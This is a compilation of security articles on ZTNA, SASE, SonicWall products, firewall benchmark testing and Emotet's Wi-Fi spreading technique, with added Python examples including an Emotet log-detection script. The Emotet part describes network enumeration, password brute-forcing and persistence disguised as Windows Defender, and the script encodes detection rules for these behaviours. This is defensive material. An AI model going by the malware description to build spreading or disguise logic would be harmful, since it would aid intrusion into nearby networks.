Of course, ZTNA does much more than that. ZTNA can "hide" applications while still granting access to authorized users. Unlike VPNs, ZTNA technology does not expose anything outside the network for authentication, whereas VPN concentrators sit at the edge of the network, visible to anyone on the internet, which makes them a target for malicious attackers.

What's more, ZTNA uses inside-out connections, which means internal IP addresses are never exposed to the internet. Instead of granting access to the network like a VPN, ZTNA technology uses a micro-segmentation approach, where a secure segment is created between the end user and the named application.

ZTNA creates an access environment that provides private access to an application for an individual user, and only grants the lowest level of privileges to that user.

ZTNA technology decouples access to applications from access to the network, creating a new paradigm of connectivity. ZTNA based solutions also capture much more information than a VPN, which helps with analytics and security planning.

While a VPN may only track a device's IP address, port data, and protocols, ZTNA solutions capture data around the user identity, named application, latency, locations, and much more. It creates an environment that allows administrators to be more proactive and more easily consume and analyze the information.
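The following Python example, added here to make the ZTNA decision model concrete, is not Cato's or any vendor's product logic; it is a constructed policy engine. The applications, groups, device-posture fields and locations are assumptions, as is the shape of the audit record. It contrasts a per-user, per-application, default-deny decision carrying identity, application and location with the bare connection tuple a VPN concentrator would log.

```python
"""ZTNA-style per-application access decision (added example, not any vendor's code).

A VPN gives a device a seat on the network and logs little more than IP and port.
A ZTNA broker decides per user, per named application, denies by default, grants
the least privilege the rule allows, and records identity, application and
location with every decision. Everything below (policy, users, apps) is constructed.
"""
from dataclasses import dataclass

@dataclass(frozen=True)
class AccessRequest:
    user: str
    groups: frozenset
    device_managed: bool      # device posture: enrolled / running the agent (assumed field)
    mfa_passed: bool
    location: str             # country code reported by the broker (assumed field)
    application: str          # a named application, never a subnet
    action: str               # "read" or "write"

@dataclass(frozen=True)
class Rule:
    application: str
    allowed_groups: frozenset
    require_managed_device: bool = True
    require_mfa: bool = True
    allowed_locations: frozenset = frozenset()  # empty means any location
    max_action: str = "read"                    # least privilege: widest action granted

ACTION_RANK = {"read": 0, "write": 1}

# Constructed policy: each rule names exactly one application; anything unnamed is unreachable.
POLICY = [
    Rule("crm", frozenset({"sales", "sales-ops"}), max_action="write"),
    Rule("hr-portal", frozenset({"hr"}), allowed_locations=frozenset({"US", "CA"})),
    Rule("git", frozenset({"engineering"}), max_action="write"),
]

def decide(req: AccessRequest, policy=POLICY) -> dict:
    """Return an audit record with the decision. Default deny: an application with no
    rule, or a request failing any condition of its rule, is refused with a reason."""
    record = {
        "user": req.user, "application": req.application, "action": req.action,
        "location": req.location, "device_managed": req.device_managed,
        "decision": "deny", "reason": "no rule for application",
    }
    for rule in policy:
        if rule.application != req.application:
            continue
        if not (req.groups & rule.allowed_groups):
            record["reason"] = "user not in an allowed group"
        elif rule.require_managed_device and not req.device_managed:
            record["reason"] = "unmanaged device"
        elif rule.require_mfa and not req.mfa_passed:
            record["reason"] = "mfa not satisfied"
        elif rule.allowed_locations and req.location not in rule.allowed_locations:
            record["reason"] = "location not permitted"
        elif ACTION_RANK[req.action] > ACTION_RANK[rule.max_action]:
            record["reason"] = "action exceeds least-privilege grant"
        else:
            record["decision"] = "allow"
            record["reason"] = "matched rule for " + rule.application
        return record  # one rule per application, so the first match is authoritative
    return record

def vpn_style_log(src_ip: str, dst_ip: str, dst_port: int, proto: str) -> dict:
    """What a connection-level VPN log captures: no user, no application, no posture."""
    return {"src": src_ip, "dst": dst_ip, "port": dst_port, "proto": proto}

if __name__ == "__main__":
    alice = AccessRequest("alice", frozenset({"sales"}), True, True, "US", "crm", "write")
    print(decide(alice))
    print(decide(AccessRequest("alice", frozenset({"sales"}), True, True, "US", "git", "read")))
    print(vpn_style_log("10.8.0.12", "10.0.5.20", 443, "tcp"))
```

Note that every denial carries the failing condition, so the same record serves both enforcement and the analytics the text describes; the VPN record, by contrast, cannot even say who was connected.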

While ZTNA may be a monumental step forward from legacy VPN systems, ZTNA solutions are not without their own concerns. ZTNA solutions do not address performance and scalability issues and may lack the core components of continuity, such as failover and automated rerouting of traffic.

In other words, ZTNA may require those additional third-party solutions to be added to the mix to support BCP.

Resolving ZTNA and VPN issues with SASE

A newer technology, which goes by the moniker of SASE (Secure Access Service Edge), may very well have the answer to the dilemmas of security, continuity, and scale that both ZTNA and VPNs introduce into the networking equation.

The Secure Access Service Edge (SASE) model was proposed by Gartner's leading security analysts, Neil MacDonald, Lawrence Orans, and Joe Skorupa. Gartner presents SASE as a way to collapse the networking and security stacks of SD-WANs into a fully integrated offering that is both easy to deploy and manage.

Gartner sees SASE as a game-changer in the world of wide-area networking and cloud connectivity. The research house expects 40% of enterprises to adopt SASE by 2024. However, a significant challenge remains: networking and cybersecurity vendors are still building their SASE offerings, and very few are actually available at this time.

One such vendor is Cato Networks, which offers a fully baked SASE solution and has been identified as one of the leaders in the SASE game by Gartner.

SASE differs significantly from the VPN and ZTNA models by leveraging a native cloud architecture that is built on the concepts of SD-WAN (Software-Defined Wide Area Network). According to Gartner, SASE is an identity-driven connectivity platform that uses a native cloud architecture to support secure connectivity at the network edge that is globally distributed.

SASE gives organizations access to what is essentially a private networking backbone that runs within the global internet. What's more, SASE incorporates automated failover, AI-driven performance tuning, and multiple secure paths into the private backbone.

SASE is deployed at the edge of the network, where the LAN connects to the public internet to access cloud or other services. And as with other SD-WAN offerings, the edge has to connect to something beyond the four walls of the private network.

In Cato's case, the company has created a global private backbone, which is connected via multiple network providers. Cato has built a private cloud that can be reached over the public internet.

SASE also offers the ability to combine the benefits of SDP with the resiliency of an SD-WAN, without introducing any of the shortcomings of a VPN.

Case in point is Cato's Instant Access, a clientless connectivity model that uses a Software-Defined Perimeter (SDP) solution to grant secure access to cloud-delivered applications for authorized remote users.

Instant Access offers multi-factor authentication, single sign-on and least-privilege access, and is incorporated into the combined networking and security stacks. Since it is built on SASE, full administrator visibility is a reality, as are simplified deployment, instant scalability, integrated performance management and automated failover.


In Cato's case, continuous threat protection keeps remote workers, as well as the network, safe from network-based threats. Cato's security stack includes NGFW, SWG, IPS, advanced anti-malware, and a Managed Threat Detection and Response (MDR) service. Of course, Cato isn't the only player in the SASE game; other vendors pushing into SASE territory include Cisco, Akamai, Palo Alto Networks, Symantec, VMware, and Netskope.

SASE Addresses the Problems of VPNs, ZTNA -- and More

With VPNs coming up short and ZTNA lacking critical functionality, such as ease of scale and performance management, it is quickly becoming evident that CISOs may need to take a long hard look at SASE.

SASE addresses the all too common problems that VPNs are introducing into a rapidly evolving remote work paradigm, while still offering the application-centric security that ZTNA brings to the table.

What's more, SASE brings with it advanced security, enhanced visibility, and reliability that will go a long way to improving continuity, while also potentially lowering costs.

Source :
https://thehackernews.com/2020/05/rethink-wan-connectivity.html

Why Securing Remote Work is Crucial To Ensuring Business Continuity

If you had asked them in January, most organizations would probably have said things were humming along smoothly. Economic growth was strong, and in most cases budgets and security plans were being created and carried out without any need or intention to disrupt the status quo.

Then the entire world changed.

Within the space of a couple weeks, bustling offices were deserted one by one as federal, state, provincial and local governments issued stay-at-home and shelter-in-place orders, and employees boxed up their essential belongings and became part of the rapidly expanding global remote workforce.

While these moves were necessary to stem the spread of COVID-19, the disruption that this sudden change brought with it introduced a set of problems most businesses were ill-equipped to manage.

Companies that previously felt confident in their cybersecurity strategy suddenly found that they didn’t have the capacity or licenses to secure a full-scale mobile workforce. Worse, they needed to manage employees ill-prepared for the transition, many of whom didn’t understand the additional precautions required for safe remote work.

For hackers, though, these are the salad days — and the combination of inexperienced employees and unprepared businesses has brought them out in force. According to Reuters, hacking activity targeting corporations in the U.S. and elsewhere more than doubled in March, and preliminary reports show much the same for April. These threats highlight the urgent need for scalable Secure Remote Access and VPN license capacity to handle the new influx of remote employees while offering the same level of security offered on-prem.

Greater capacity for increased security

To help small- and medium-sized businesses (SMB) handle a rapidly expanding remote workforce, SonicWall has improved the scalability of its SMA 210 and 410 appliances — the 210 can now manage up to 200 remote VPN users, and the 410 can now support 400.

Many enterprises, governments and MSSPs are facing issues with scalability, too. To handle the influx of remote users on large distributed networks, the SonicWall SMA 1000 series allows these organizations to scale up to a million remote VPN users.

To scope which SMA solution is right for your organization, review the SonicWall Secure Mobile Access data sheet.

New public cloud options for the ‘new business normal’

The remote-work revolution coincides with another major shift in how enterprises work — the ongoing cloud transformation. The benefits of moving to a public cloud are myriad — including cost savings, greater agility, maximum uptime and quick and easy deployment.

While SonicWall has long supported private clouds, such as VMware ESXi and Microsoft Hyper-V, SonicWall SMA 500v and SMA 8200v virtual appliances can now be launched on AWS or Microsoft Azure, allowing businesses to realize these benefits at a time when they may need them the most.

Protect remote workers with special offers on SMA, VPN

Right now, budget concerns are at the forefront for many businesses. To help both new and existing customers implement necessary security during this time of crisis, SonicWall has launched several new ‘Work From Home Securely’ promotions to ensure organizations can implement comprehensive security in a cost-effective way.

With SonicWall’s new Work From Home Securely special offers on SMA and other solutions, there’s never been a better time — or a more crucial time — to secure your remote workforce.

Source :
https://blog.sonicwall.com/en-us/2020/04/why-securing-remote-work-is-crucial-to-ensuring-business-continuity/

SonicWall Firewall Certified via NetSecOPEN Laboratory Testing, Earns Perfect Security Effectiveness Score Against Private CVE Attacks

Security-conscious customers face tough choices when evaluating security vendors and their next-generation firewall offerings.

To simplify this process and improve transparency in the cybersecurity market, NetSecOPEN announces SonicWall is one of only four security vendors to be certified in its 2020 NetSecOPEN Test Report.

Tested with 465 combined public and private Common Vulnerabilities and Exposures (CVE) entries at the InterOperability Laboratory of the University of New Hampshire, the SonicWall NSa 4650 firewall achieved 100% security effectiveness against all private CVEs used in the test, i.e. vulnerabilities not disclosed to NGFW vendors in advance. Overall, SonicWall rated 99% when factoring in the results of the public CVE test.

“This apples-to-apples comparison provides security buyers with validation of real-world performance and security effectiveness of next-generation firewalls when fully configured for realistic conditions,” said Atul Dhablania, Senior Vice President and Chief Operating Officer, SonicWall, in the official announcement.

Testing firewalls in real-world conditions

The NetSecOPEN open standard is designed to simulate various permutations of real-world test conditions, specifically to address the challenges faced by security professionals when measuring and determining if the tested firewall is performing the way vendors had promised. The value of this service is maximized when test findings help you make clear and conclusive product decisions based on incontrovertible evidence.

SonicWall is among the first to excel in one of the industry’s most comprehensive and rigorous benchmark tests ever created for NGFWs. In summary, the NetSecOPEN Test Report reveals that the SonicWall NSa 4650 NGFW:

  • Demonstrated one of the highest security effectiveness ratings in the industry
  • Blocked 100% of attacks against all private vulnerabilities used in the test
  • Blocked 99% of all attacks overall, private and public
  • Proved fast performance measured by NetSecOPEN at 3.5 Gbps of threat protection and up to 1.95 Gbps SSL decryption and inspection throughput
  • Affirmed its extremely high-performing and scalable enterprise security platform can meet the security and massive data and capacity demands of the largest of data centers

Firewall testing methodologies, metrics

Key performance indicators (KPIs), such as throughput, latency and the other metrics listed below, are important in determining a product’s acceptability. These KPIs were recorded during NetSecOPEN testing using standard recommended firewall configurations and the security features typically enabled in real-world use.

KPI | Meaning | Interpretation
CPS | TCP Connections Per Second | Measures the average number of established TCP connections per second in the sustaining period. For the “TCP/HTTP(S) Connections Per Second” benchmarking scenario, the KPI is the average number of TCP connections established and terminated per second simultaneously.
TPUT | Throughput | Measures the average Layer 2 throughput within the sustaining period, as well as the average packets per second within the same period. Throughput is expressed in Kbit/s.
TPS | Application Transactions Per Second | Measures the average number of successfully completed application transactions per second in the sustaining period.
TTFB | Time to First Byte | Measures the minimum, maximum and average time to first byte. TTFB is the elapsed time between the client sending the SYN packet and receiving the first byte of application data from the DUT/SUT. TTFB SHOULD be expressed in milliseconds.
TTLB | Time to Last Byte | Measures the minimum, maximum and average per-URL response time in the sustaining period. Latency is measured at the client, as the time between sending a GET request and receipt of the complete response from the server.
CC | Concurrent TCP Connections | Measures the average number of concurrently open TCP connections in the sustaining period.
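To show how the KPIs in the table are derived from raw measurements, here is an added Python example that is not NetSecOPEN's or SonicWall's test tooling. The per-transaction records (SYN, GET, first byte, last byte, teardown, bytes moved, success flag) are constructed, as is the choice to compute average concurrency by integrating each connection's open time over the sustaining period.

```python
"""Compute NetSecOPEN-style KPIs (CPS, TPUT, TPS, TTFB, TTLB, CC) from per-transaction
records. Added example, not the test lab's code; the SAMPLE records are constructed."""
from statistics import mean

# One record per HTTP transaction through the device under test (DUT). Times are seconds
# on a shared clock. syn: client sends SYN; get: client sends the GET; first_byte: first
# application byte reaches the client; last_byte: full response received; fin: connection
# torn down; bytes: Layer 2 bytes carried; ok: transaction completed successfully.
SAMPLE = [
    dict(syn=0.00, get=0.01, first_byte=0.02, last_byte=0.10, fin=0.11, bytes=150_000, ok=True),
    dict(syn=0.05, get=0.06, first_byte=0.09, last_byte=0.30, fin=0.31, bytes=600_000, ok=True),
    dict(syn=0.50, get=0.51, first_byte=0.53, last_byte=0.60, fin=0.62, bytes=120_000, ok=True),
    dict(syn=0.80, get=0.81, first_byte=0.85, last_byte=1.40, fin=1.41, bytes=900_000, ok=False),
    dict(syn=1.00, get=1.01, first_byte=1.02, last_byte=1.05, fin=1.06, bytes=30_000,  ok=True),
    dict(syn=1.50, get=1.51, first_byte=1.54, last_byte=1.90, fin=1.95, bytes=700_000, ok=True),
]

def kpis(records, period_start, period_end):
    """Return the KPIs for the sustaining period [period_start, period_end).

    CPS  : connections established per second (counted by SYN time in the period)
    TPUT : Layer 2 throughput in Kbit/s
    TPS  : successfully completed application transactions per second
    TTFB : (min, max, avg) ms from SYN to first application byte
    TTLB : (min, max, avg) ms from GET to receipt of the complete response
    CC   : average concurrently open connections, i.e. total open time clipped to the
           period divided by the period length (assumed method for averaging)
    """
    duration = period_end - period_start
    in_period = [r for r in records if period_start <= r["syn"] < period_end]
    completed = [r for r in in_period if r["ok"]]
    ttfb = [(r["first_byte"] - r["syn"]) * 1000 for r in in_period]
    ttlb = [(r["last_byte"] - r["get"]) * 1000 for r in in_period]
    # Connections that straddle the period boundaries contribute only the overlapping time.
    open_time = sum(
        max(0.0, min(r["fin"], period_end) - max(r["syn"], period_start)) for r in records
    )
    bits = sum(r["bytes"] * 8 for r in in_period)
    return {
        "CPS": len(in_period) / duration,
        "TPUT_kbps": bits / duration / 1000,
        "TPS": len(completed) / duration,
        "TTFB_ms": (min(ttfb), max(ttfb), mean(ttfb)),
        "TTLB_ms": (min(ttlb), max(ttlb), mean(ttlb)),
        "CC": open_time / duration,
    }

if __name__ == "__main__":
    for name, value in kpis(SAMPLE, 0.0, 2.0).items():
        print(f"{name:>9}: {value}")
```

The failed transaction still counts toward CPS (the connection was established) but not toward TPS, which is why the two diverge; narrowing the period shows the clipping of connections that outlive it in the CC figure.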

Importance of transparent testing of cybersecurity products

Before making an important business-critical purchase decision that is central to the cyber-defense of an organization, decision-makers likely spent countless days exercising due diligence. This may include conducting extensive vendor research, catching up on analyst opinions and insights, going through various online forums and communities, seeking peer recommendations and, more importantly, finding that one trustworthy third-party review that can help guide your purchase decision.

Unfortunately, locating such reviews can be a bewildering exercise as most third-party testing vendors and their methodologies are not well-defined nor do they follow established open standards and criteria for testing and benchmarking NGFW performance.

Recognizing that customers often rely on third-party reviews to validate vendors’ claims, SonicWall joined NetSecOPEN in December 2018 as one of its founding members. NetSecOPEN is the first industry organization focused on creating open, transparent network security performance testing standards adopted by the Internet Engineering Task Force (IETF).

SonicWall recognizes NetSecOPEN for its reputation as an independent and unbiased product test and validation organization. We endorse its IETF initiative, open standards and benchmarking methodology for network security device performance.

As a contributing member, SonicWall actively works with NetSecOPEN and other members to help define, refine and establish repeatable and consistent testing procedures, parameters, configurations, measurements and KPIs to produce what NetSecOPEN declares as a fair and reasonable comparison across all network security functions. This should give organizations total transparency about cybersecurity vendors and their products’ performance.

 

Source :
https://blog.sonicwall.com/en-us/2020/02/sonicwall-firewall-certified-via-netsecopen-lab-testing-earns-perfect-score/

Emotet Now Hacks Nearby Wi-Fi Networks to Spread Like a Worm

The new tactic used by Emotet allows the malware to infect nearby insecure Wi-Fi networks – and their devices – via brute force loops.

A newly uncovered Emotet malware sample has the ability to spread to insecure Wi-Fi networks located near an infected device.

If the malware can spread to these nearby Wi-Fi networks, it then attempts to infect devices connected to them, a tactic that can rapidly escalate Emotet’s spread, said researchers. The new development is particularly dangerous for the already-prevalent Emotet malware, which since its return in September has taken on new evasion and social engineering tactics to steal credentials and spread trojans to victims (like the United Nations).

“With this newly discovered loader-type used by Emotet, a new threat vector is introduced to Emotet’s capabilities,” said James Quinn, threat researcher and malware analyst for Binary Defense, in a Friday analysis. “Previously thought to only spread through malspam and infected networks, Emotet can use this loader-type to spread through nearby wireless networks if the networks use insecure passwords.”

While researchers noticed the Wi-Fi spreading binary being delivered for the first time on Jan. 23, they said that the executable has a timestamp of 4/16/2018, hinting that the Wi-Fi spreading behavior has been running unnoticed for almost two years. This may be in part due to how infrequently the binary is dropped, researchers said, as this is the first time they’ve seen it despite tracking Emotet since its return in 2019.

The Emotet sample first infects the initial system with a self-extracting RAR file containing two binaries (worm.exe and service.exe) used for the Wi-Fi spreading. After the RAR file unpacks itself, worm.exe executes automatically.

The worm.exe binary immediately begins profiling wireless networks in order to attempt to spread to other Wi-Fi networks. Emotet makes use of the wlanAPI interface to do this. wlanAPI is the library behind the Windows Native Wifi application programming interface (API), which manages wireless network profiles and wireless network connections.

Once a Wi-Fi handle has been obtained, the malware calls WlanEnumInterfaces, which enumerates the wireless interfaces present on the victim’s system, and then retrieves the list of networks visible from each interface. The available networks are returned in a series of structures that carry everything needed to join them, including their SSID, signal strength, encryption type and network authentication method.

Once the data for each network has been obtained, the malware moves into the connection with “brute-forcing loops.” Attackers use a password obtained from “internal password lists” (it’s not clear how this internal password list has been obtained) to attempt to make the connection. If the connection is not successful, the function loops and moves to the next password on the password list.

If the password is correct and the connection is successful, the malware sleeps for 14 seconds before sending an HTTP POST to its command-and-control (C2) server on port 8080, and establishes the connection to the Wi-Fi network.

Then, the binary begins enumerating and attempting to brute-force passwords for all users (including any Administrator accounts) on the newly-infected network. If any of these brute forces are successful, worm.exe then installs the other binary, service.exe, onto the infected devices. To gain persistence on the system, the binary is installed under the guise of “Windows Defender System Service” (WinDefService).

“With buffers containing either a list of all usernames successfully brute-forced and their passwords, or the administrator account and its password, worm.exe can now begin spreading service.exe to other systems,” said researchers. “Service.exe is the infected payload installed on remote systems by worm.exe. This binary has a PE timestamp of 01/23/2020, which was the date it was first found by Binary Defense.”

After service.exe is installed and communicates back to the C2, it begins dropping the embedded Emotet executable. In this manner, the malware attempts to infect as many devices as possible.

Emotet, which started as a banking trojan in 2014 and has continually evolved to become a full-service threat-delivery mechanism, can install a collection of malware on victim machines, including information stealers, email harvesters, self-propagation mechanisms and ransomware.

Researchers, for their part, recommend blocking this new Emotet technique with the use of strong passwords to secure wireless networks.

“Detection strategies for this threat include active monitoring of endpoints for new services being installed and investigating suspicious services or any processes running from temporary folders and user profile application data folders,” they said. “Network monitoring is also an effective detection, since the communications are unencrypted and there are recognizable patterns that identify the malware message content.”
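The detection strategies quoted above (new services installed from temporary or profile folders, processes running from those folders, and unencrypted C2 traffic on port 8080) can be turned into a small triage script. The Python below is an added example, not Binary Defense's tooling; the log format is a constructed key=value layout, and the hostnames, user names, IP addresses and paths in the sample lines are invented. The service name WinDefService and the POST-to-8080 pattern are taken from the analysis above.

```python
"""Triage constructed endpoint and network log lines for the Emotet Wi-Fi-spreader
behaviours described in the article. Added example; all sample data is constructed."""
import re

# Constructed log lines: service installs, process creations and outbound connections,
# one event per line, as "<timestamp> key=value key="quoted value" ...".
LOG = r"""
2020-02-10T09:14:02Z host=WS-17 type=service_install name=WinDefService display="Windows Defender System Service" image="C:\Users\jdoe\AppData\Local\Temp\service.exe"
2020-02-10T09:14:05Z host=WS-17 type=process_create image="C:\Users\jdoe\AppData\Local\Temp\worm.exe" parent="C:\Users\jdoe\Downloads\invoice.exe"
2020-02-10T09:14:20Z host=WS-17 type=net_conn proto=tcp method=POST dst=203.0.113.45 dport=8080
2020-02-10T09:15:00Z host=WS-17 type=service_install name=Spooler display="Print Spooler" image="C:\Windows\System32\spoolsv.exe"
2020-02-10T09:15:10Z host=WS-17 type=net_conn proto=tcp method=GET dst=93.184.216.34 dport=80
""".strip().splitlines()

KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# Folders a standard user can write to; services and long-lived processes rarely belong here.
USER_WRITABLE = ("\\appdata\\local\\", "\\appdata\\roaming\\", "\\windows\\temp\\", "\\temp\\")
# Where the genuine Windows Defender binaries live (assumed allowlist for this example).
DEFENDER_DIRS = ("c:\\program files\\windows defender\\", "c:\\programdata\\microsoft\\windows defender\\")

def parse(line: str) -> dict:
    """Split a constructed log line into a dict; quoted values may contain spaces."""
    ts, rest = line.split(" ", 1)
    event = {"ts": ts}
    for key, quoted, bare in KV.findall(rest):
        event[key] = quoted if quoted else bare
    return event

def from_user_writable(path: str) -> bool:
    return any(marker in path.lower() for marker in USER_WRITABLE)

def detect(lines) -> list:
    """Return one alert dict per suspicious event; benign events produce nothing."""
    alerts = []
    for ev in map(parse, lines):
        kind = ev.get("type")
        if kind == "service_install":
            image = ev.get("image", "")
            if from_user_writable(image):
                alerts.append(dict(ts=ev["ts"], rule="service_from_user_writable_path",
                                   subject=ev.get("name"), detail=image))
            # A service that borrows the Defender name but runs outside Defender's folders.
            if "defender" in ev.get("display", "").lower() and not image.lower().startswith(DEFENDER_DIRS):
                alerts.append(dict(ts=ev["ts"], rule="service_impersonates_windows_defender",
                                   subject=ev.get("name"), detail=image))
        elif kind == "process_create":
            image = ev.get("image", "")
            if from_user_writable(image):
                alerts.append(dict(ts=ev["ts"], rule="process_from_user_writable_path",
                                   subject=image, detail=ev.get("parent", "")))
        elif kind == "net_conn":
            # The analysis reports an unencrypted HTTP POST to the C2 on port 8080.
            if ev.get("method") == "POST" and ev.get("dport") == "8080":
                alerts.append(dict(ts=ev["ts"], rule="http_post_to_8080",
                                   subject=ev.get("dst"), detail=ev.get("proto", "")))
    return alerts

if __name__ == "__main__":
    for alert in detect(LOG):
        print(alert)
```

Each rule is deliberately independent so that a hit on any one of them (a Defender look-alike service, a binary launched from %TEMP%, or a cleartext POST on 8080) surfaces even when the others are missing; the impersonation check is the one that survives if the attacker moves the binary out of a temporary folder.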

Source :
https://threatpost.com/emotet-now-hacks-nearby-wi-fi-networks-to-spread-like-a-worm/152725/